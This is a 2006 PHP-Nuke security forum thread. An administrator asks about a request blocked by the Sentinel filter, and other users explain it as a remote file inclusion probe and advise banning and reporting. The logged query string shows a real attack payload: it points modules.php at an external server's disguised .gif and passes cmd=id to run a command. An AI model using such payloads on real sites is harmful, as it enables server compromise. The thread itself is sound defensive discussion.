Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
Dauthus
Worker
Worker


Joined: Oct 07, 2003
Posts: 211

PostPosted: Sun Feb 12, 2006 1:36 pm Reply with quote

I keep getting a filter block on from a certain web page. Can anyone give me an idea of what the code on the page does?

Here's the sentinel info:

Quote:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)

Query String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Get String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Post String: bootleghollow.com/modules.php


Here's the code that shows up on the following link (Obviously not an image file): It is html code.
Only registered users can see links on this board! Get registered or login!

I didn't post the code because I thought it might kick in sentinel and get me banned.

Is this anything to worry about? Sentinel has been banning whoever tries to use the script. Just keeps adding different IP addresses to the htaccess files.

_________________
Only registered users can see links on this board! Get registered or login!
Vivere disce, cogita mori 
View user's profile Send private message Visit poster's website
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Sun Feb 12, 2006 3:09 pm Reply with quote

Subject to validation by some of the experts here, what usually happens in Nuke is that when you move around from module to module or even within a module, everything goes thru modules.php and where it goes next is determined by what follows the name= string that you listed above. Usually it is the "name" of another module within your site, say "news" or "weblinks" or "private_message" or the like. So if they formulate a string like the one you listed they are probably trying to execute a command on a different server where they can stick some kind of hack. They try to disquise that by putting the hack in a file with a gif extension but as you noted it's really html.

I believe Sentinel detects this as cross site scripting and bans it, as you noticed.
 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Feb 12, 2006 10:40 pm Reply with quote

Yep, it is a code that is used to see if your server can be hacked. Ban the IPs, report the URL to the host of that site

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©